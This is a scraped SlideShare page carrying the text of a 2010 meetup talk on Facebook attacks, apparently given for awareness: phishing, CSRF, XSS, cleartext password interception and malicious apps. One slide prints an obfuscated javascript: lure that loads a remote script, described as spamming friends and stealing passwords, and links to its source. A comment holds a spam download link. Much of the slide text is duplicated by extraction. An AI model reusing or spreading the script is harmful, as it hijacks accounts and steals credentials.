Facebook Attacks

2,072 views
1,990 views

Published on

Facebook Attacks by Dinesh @ null Hyderabad Meet, October, 2010

Published in: Technology
1 Comment
1 Like
Statistics
Notes
  • free download the updated file from here:-http://gg.gg/yi7pn
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
2,072
On SlideShare
0
From Embeds
0
Number of Embeds
342
Actions
Shares
0
Downloads
49
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Facebook Attacks

  1. 1. facebook attacks
  2. 2. Phising CSRF attack Java scripts XSS
  3. 3. Facebook Phising
  4. 4. Facebook CSRF attack Third party app server
  5. 5. There are many other attacks possible likeThere are many other attacks possible like •Brute forcingBrute forcing •Cookie stealingCookie stealing •Commercial Data miningCommercial Data mining •Database Reverse-EngineeringDatabase Reverse-Engineering
  6. 6. Password Interception •The fact that the username and password were sent in clear textThe fact that the username and password were sent in clear text is a security vulnerability.is a security vulnerability. • There are chances to read Facebook user names andThere are chances to read Facebook user names and passwords off of the Ethernet or unencrypted wireless traffic,passwords off of the Ethernet or unencrypted wireless traffic, obtaining access to users’ Facebook passwords, as well as anyobtaining access to users’ Facebook passwords, as well as any additional accounts they use those passwords for.additional accounts they use those passwords for. •Also the tabnabbing and CSRF have gained popularity over theAlso the tabnabbing and CSRF have gained popularity over the open platformopen platform Current Facebook Precaution:Current Facebook Precaution: Facebook currently takes no steps to protect user passwords in transitFacebook currently takes no steps to protect user passwords in transit.
  7. 7. javascript:d=document;c=d.createElement(%22script %22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su %22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0) FREE!! CELLPHONE RECHARGE::.. This Script very popularly seen on Facebook, Orkut and Many other Social Networking sites. AnalysingAnalysing and Demoand Demo
  8. 8. What does It do? •It is sending messages to all my friends to Recharge fromIt is sending messages to all my friends to Recharge from accountaccount •It is adding comments in Albums of my friendsIt is adding comments in Albums of my friends •It is creating Threads in the Communities I Joined sayingIt is creating Threads in the Communities I Joined saying that “Recharge this” also its adding some otherthat “Recharge this” also its adding some other Communities to my listCommunities to my list •Redirects you to the Fake FB login page after 10-15 minsRedirects you to the Fake FB login page after 10-15 mins stealing your passwordstealing your password Source Script @ http://www.mediafire.com/?t2lagmvsvftww28http://www.mediafire.com/?t2lagmvsvftww28
  9. 9. http://www.facebook.com/profile.php?id=100000781542573 www.facebook.com/username
  10. 10. The Facebook Platform API – The API defines the various methods through which you can interactAPI – The API defines the various methods through which you can interact with Facebook. If you’re not familiar with the idea of an API, take a look atwith Facebook. If you’re not familiar with the idea of an API, take a look at some recent Digital Web articles: APIs and Mashups for the Rest of Us andsome recent Digital Web articles: APIs and Mashups for the Rest of Us and Hacking on Open APIs.Hacking on Open APIs. FBML – Facebook Markup Language is a custom markup language based onFBML – Facebook Markup Language is a custom markup language based on various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-basedvarious bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based syntax, and is used to define the pages in your application.syntax, and is used to define the pages in your application. FQL – Facebook Query Language is SQL for Facebook. A powerful queryFQL – Facebook Query Language is SQL for Facebook. A powerful query language for situations where there are no existing helper methods in thelanguage for situations where there are no existing helper methods in the API, or handy tags in FBML, to do exactly what you need.API, or handy tags in FBML, to do exactly what you need.
  11. 11. How to add an application in Facebook
  12. 12. How can this be Used For Exploiting? •You can Upload your own Application of any type. •So doesn’t this strike you something of a hackers insterest
  13. 13. How can this be Used For Exploiting?
  14. 14. THANK YOUTHANK YOU

×